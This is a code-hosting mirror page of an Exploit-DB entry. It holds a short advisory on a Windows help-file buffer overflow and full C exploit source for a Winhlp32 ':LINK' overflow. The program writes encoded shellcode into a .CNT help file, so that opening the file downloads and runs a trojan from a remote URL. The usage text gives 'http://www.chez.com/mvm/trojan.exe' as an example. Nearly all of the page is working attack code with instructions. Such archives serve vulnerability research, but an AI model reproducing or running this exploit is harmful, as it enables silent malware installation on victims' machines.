bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/remote/22289.c
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

222 lines
No EOL
8.1 KiB
C
Raw Blame History

// source: https://www.securityfocus.com/bid/6966/info
The Microsoft Windows ME Help and Support Center is prone to a buffer overflow. This is due to insufficient bounds checking on input supplied through the HCP URI parameter.
An attacker can exploit this vulnerability by making a HCP request with an overly long string. This will trigger the overflow condition and may result in malicious attacker-supplied code being executed on the vulnerable system.
A similar vulnerability was reported in the Windows XP Help and Support Center (BID 6802). These vulnerabilities may be related.
** Conflicting details have been reported about this vulnerability. The discoverer claims that the issue is cross site scripting that allows script code emebedded into the HCP URL to be executed. The discoverer also claims that Windows XP without SP1 is also vulnerable to this issue, while Microsoft claims that it is not.
/*************************************************
* s0h - Skin Of Humanity.
* http://s0h.cc
*
* Title : Win32hlp exploit for : ":LINK overflow"
* Date : Sunday, 9 March, 2003 1:00 AM
*
* -----------------------------------------------
*
* Archive : http://s0h.cc/exploit/s0h_Win32hlp.c
* Binary : http://s0h.cc/exploit/s0h_Win32hlp.exe
*
* -----------------------------------------------
* Discovered by ThreaT <threat@s0h.cc>.
* Coded by ThreaT <threat@s0h.cc>
* Hompage : http://s0h.cc/~threat/
*
* Winhlp32.exe exploit for ':LINK' overflow !
*
* -----------------------------------------------
*
* This exploit can trap a .CNT file (file with .-
* HLP files) with the arbitrary code who can dow-
* nload and execute a trojan without user ask.
*
* -----------------------------------------------
*
* Compiling : cl /nologo s0h_Win32hlp.c
* Usage : s0h_Win32hlp.exe <trojan> <CNT file> [offset]
* Eq : C:\>s0h_Win32hlp.exe http://www.chez.com/mvm/trojan.exe c:\WINNT\Help\mplayer2.cnt 4
*
* <trojan> = host to download the trojan (http:/-
* /blah.plof/trojan.exe).
*
* <CNT file> = The CNT file.
*
* [offset] = Optionnal. This one defined a numbe-
* r between 0 and 15 that can play with the retu-
* rn address. Generaly, you must used 4 if the .-
* HLP file is called by an application.
*
* -----------------------------------------------
* This exploit was tested on :
* - Windows 2000 PRO/SERVER (fr) SP0
* - Windows 2000 PRO/SERVER (fr) SP1
* - Windows 2000 PRO/SERVER (fr) SP2
*
************************************************/
#include <windows.h>
#define taille 270
#define VulnLen 650
int main (int argc, char *argv[]) {
HANDLE ExploitFile;
DWORD lpNumberOfBytesWritten, lpFileSizeHigh, FileSize;
int i,j, len, RetByte=0xE5;
char *file, *url;
unsigned char *Shellcode, *buffer,
RealGenericShellcode[] =
"\x68\x5E\x56\xC3\x90\x8B\xCC\xFF\xD1\x83\xC6\x0E\x90\x8B\xFE\xAC"
"\x34\x99\xAA\x84\xC0\x75\xF8"
"\x72\xeb\xf3\xa9\xc2\xfd\x12\x9a\x12\xd9\x95\x12\xd1\x95\x12\x58\x12\xc5\xbd\x91"
"\x12\xe9\xa9\x9a\xed\xbd\x9d\xa1\x87\xec\xd5\x12\xd9\x81\x12\xc1\xa5\x9a\x41\x12"
"\xc2\xe1\x9a\x41\x12\xea\x85\x9a\x69\xcf\x12\xea\xbd\x9a\x69\xcf\x12\xca\xb9\x9a"
"\x49\x12\xc2\x81\xd2\x12\xad\x03\x9a\x69\x9a\xed\xbd\x8d\x12\xaf\xa2\xed\xbd\x81"
"\xed\x93\xd2\xba\x42\xec\x73\xc1\xc1\xaa\x59\x5a\xc6\xaa\x50\xff\x12\x95\xc6\xc6"
"\x12\xa5\x16\x14\x9d\x9e\x5a\x12\x81\x12\x5a\xa2\x58\xec\x04\x5a\x72\xe5\xaa\x42"
"\xf1\xe0\xdc\xe1\xd8\xf3\x93\xf3\xd2\xca\x71\xe2\x66\x66\x66\xaa\x50\xc8\xf1\xec"
"\xeb\xf5\xf4\xff\x5e\xdd\xbd\x9d\xf6\xf7\x12\x75\xc8\xc8\xcc\x66\x49\xf1\xf0\xf5"
"\xfc\xd8\xf3\x97\xf3\xeb\xf3\x9b\x71\xcc\x66\x66\x66\xaa\x42\xca\xf1\xf8\xb7\xfc"
"\xe1\x5f\xdd\xbd\x9d\xfc\x12\x55\xca\xca\xc8\x66\xec\x81\xca\x66\x49\xaa\x42\xf1"
"\xf0\xf7\xdc\xe1\xf3\x98\xf3\xd2\xca\x71\xb5\x66\x66\x66\x14\xd5\xbd\x89\xf3\x98"
"\xc8\x66\x49\xaa\x42\xf1\xe1\xf0\xed\xc9\xf3\x98\xf3\xd2\xca\x71\x8b\x66\x66\x66"
"\x66\x49\x71\xe6\x66\x66\x66";
printf (" * ***************************************************** *\n"
" * s0h - Skin of humanity *\n"
" * http://s0h.cc/ *\n"
" * ***************************************************** *\n"
" Win32hlp exploit for : \":LINK overflow\" *\n"
" * ***************************************************** *\n"
" * Discovered by ThreaT <threat@s0h.cc>. *\n"
" * Coded by ThreaT <threat@s0h.cc> *\n"
" * Hompage : http://s0h.cc/~threat/ *\n"
" * Archive : http://s0h.cc/exploit/s0h_Win32hlp.c *\n"
" * ***************************************************** *\n"
);
if (argc < 3)
{
printf(
" * ***************************************************** *\n"
" * Usage : s0h_Win32hlp.exe <trojan> <CNT file> [offset] *\n"
" * *\n"
" * <trojan> = host to download the trojan (http:/- *\n"
" * /blah.plof/trojan.exe). *\n"
" * *\n"
" * <CNT file> = The CNT file. *\n"
" * *\n"
" * [offset] = Optionnal. This one defined a number betw- *\n"
" * een 0 and 15 that can play with the return address. - *\n"
" * Generaly, you must used 4 if the .HLP file is called *\n"
" * by an application. *\n"
" * ***************************************************** *\n"
);
ExitProcess (1);
}
if (argv[3]) RetByte = atoi (argv[3]) + 0xE0;
len = taille + strlen (argv[1]) + 2 + 4;
url = (char *) malloc (strlen (argv[1]));
strcpy (url, argv[1]);
/*
* Create the final shellcode
*/
Shellcode = (unsigned char *) malloc (len);
// encrypt the URL
for (i=0;i<strlen (argv[1]); argv[1][i++]^=0x99);
// inject the RealGenericShellcode in the shellcode buffer
for (i=0;i<taille; Shellcode[i]=RealGenericShellcode[i++]);
// append crypted URL to the shellcode buffer
for (i,j=0;i<len - 1;Shellcode[i++]=argv[1][j++]);
Shellcode[len-6]=0x99; // URL delimitation
Shellcode[len-5]=0x2E; // fuck the winhlp32.exe parser
// append the RET ADDR
// Play with this bytes if the xploit don't work
Shellcode[len-4]=0x30;
Shellcode[len-3]=RetByte;
Shellcode[len-2]=0x06;
Shellcode[len-1]=0x00;
/* Now, we make a vuln string for our exploit */
buffer = (unsigned char *) malloc (VulnLen);
memset (buffer,0,VulnLen);
lstrcpy (buffer,":Link ");
for (i=6; i < VulnLen - len; buffer[i++] = (char)0x90);
for (i,j=0; i < VulnLen; buffer[i++] = Shellcode[j++]);
/* Trap the CNT file specified with the vuln string */
ExploitFile = CreateFile (argv[2],GENERIC_READ+GENERIC_WRITE,
FILE_SHARE_READ+FILE_SHARE_WRITE,NULL,
OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
if ( ExploitFile == INVALID_HANDLE_VALUE) {
printf ("Error : cannot open cnt file '%s'\n",argv[2]);
ExitProcess (1);
}
FileSize = GetFileSize(ExploitFile, &lpFileSizeHigh);
FileSize += lpFileSizeHigh*MAXDWORD;
file = (char *)LocalAlloc (LPTR, FileSize + 2);
file[0] = 0x0d;
file[1] = 0x0a;
file += 2;
ReadFile(ExploitFile,file,FileSize,&lpNumberOfBytesWritten,NULL);
SetFilePointer (ExploitFile,0,NULL,FILE_BEGIN);
WriteFile (ExploitFile,buffer,VulnLen,&lpNumberOfBytesWritten,NULL);
file -= 2;
WriteFile (ExploitFile,file,FileSize+2,&lpNumberOfBytesWritten,NULL);
CloseHandle(ExploitFile);
printf (
" * *******************************************************\n"
" * The file is now traped and ready to download and exe- *\n"
" * cute : *\n"
" * File : %s\n"
" * At : %s\n"
" * *******************************************************\n"
,argv[2],url);
if (RetByte != 0xE5)
printf (
" * *******************************************************\n"
" * You have specified this address : 0x0006%x30 *\n"
" * The abitrary will loaded since an application. *\n"
" * *******************************************************\n"
,RetByte);
return 0;
}
Reference in a new issue View git blame Copy permalink